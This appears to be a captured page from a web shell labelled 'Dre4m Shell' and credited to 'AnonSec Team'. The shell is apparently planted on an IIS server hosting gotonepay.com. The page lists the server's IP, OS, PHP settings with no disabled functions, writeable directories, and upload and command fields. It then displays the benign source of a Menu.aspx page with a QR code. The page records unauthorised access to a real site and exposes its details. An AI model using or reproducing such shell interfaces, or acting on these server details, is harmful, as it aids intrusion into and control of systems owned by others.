Dre4m Shell
Server IP : 103.6.199.200  /  Your IP : 18.224.31.90
Web Server : Microsoft-IIS/10.0
System : Windows NT EMPUSA 10.0 build 20348 (Windows Server 2016) i586
User : EMPUSA$ ( 0)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/Domains/tradepan/gotonepay.com/wwwroot/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/Domains/tradepan/gotonepay.com/wwwroot/Menu.aspx
<%@ page language="C#" autoeventwireup="true" inherits="Menu, App_Web_khi2w1wm" %>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head runat="server">
<LINK href="cPanel/common.css" rel="stylesheet">
<LINK href="cPanel/cPanel.css" rel="stylesheet">
	 
    <title>EUP Mobile</title>
    
<meta name="viewport" content="width=device-width,initial-scale=1,user-scalable=no" />
<script type="text/javascript" src="Member/js/jquery.min.js"></script>
<script type="text/javascript" src="Member/js/qrcode.js"></script>


</head>
<body>
    <form id="form1" runat="server">

        <asp:Label ID="lblPoint" runat="server" Text=""></asp:Label>
<br />
<center>
<table width="200px"  >
<tr   ><td >
<DIV class="PForm_conten2t">
<DIV class="PForm_body">
<DIV class="PForm_header">
<CENTER>
<asp:Label ID="lbltext" runat="server" Text=""  ></asp:Label>
</CENTER></DIV>
    

<DIV  class="PForm" >
<center>
<div id="qrcode" style="width:100px; height:100px; margin-top:15px;" ></div>
</center>
</DIV>

</DIV></DIV>
</td></tr>
</table> 
<br /><br />
<asp:TextBox ID="text" runat="server" Text="1231231234" Width="98%" ></asp:TextBox>
<br /><br />
</center>
<table width="100%" >

<tr><td></td>
<td width="200px">
<DIV class="PForm_conten2t">
<DIV class="PForm_body">
<DIV class="PForm_header">
<CENTER>Use  Point</CENTER></DIV>

<DIV  class="PForm" >
<center>
<a href="MyScan.aspx" ><IMG src='Member/Img/ico_01_V002.png' width='65%'></a>
</center>
</DIV>

</DIV></DIV>
</td><td>
</td>
<td width="200px">
<DIV class="PForm_conten2t">
<DIV class="PForm_body">
<DIV class="PForm_header">
<CENTER>Upload Receipt</CENTER></DIV>

<DIV  class="PForm" >
<center>
<a href="tranx.aspx" ><IMG src='Member/Img/ico_02_V002.png' width='65%'></a>
</center>
</DIV>

</DIV></DIV>
</td><td>
</td>
</tr>



<tr>
<td></td>
<td width="200px">
<DIV class="PForm_conten2t">
<DIV class="PForm_body">
<DIV class="PForm_header">
<CENTER>Transaction</CENTER></DIV>

<DIV  class="PForm" >
<center>
<a href="tranx.aspx" ><IMG src='Member/Img/ico_03_V002.png' width='65%'></a>
</center>
</DIV>

</DIV></DIV>
</td><td>
</td>
<td width="200px">
<DIV class="PForm_conten2t">
<DIV class="PForm_body">
<DIV class="PForm_header">
<CENTER>Exit</CENTER></DIV>

<DIV  class="PForm" >
<center>
<a href="member/off.aspx" ><IMG src='Member/Img/ico_04_V002.png' width='65%'></a>
</center>
</DIV>

</DIV></DIV>
</td>
<td></td>
</tr>
</table> 




                
<script type="text/javascript">
var qrcode = new QRCode(document.getElementById("qrcode"), {
	width : 100,
	height : 100
});

function makeCode () {		
	var elText = document.getElementById("text");
	
	if (!elText.value) {
		alert("Input a text");
		elText.focus();
		return;
	}
	
	qrcode.makeCode(elText.value);
}

makeCode();

$("#text12").
	on("blur", function () {
		makeCode();
	}).
	on("keydown", function (e) {
		if (e.keyCode == 13) {
			makeCode();
		}
	});
</script>


    </form>
</body>
</html>

Anon7 - 2022
AnonSec Team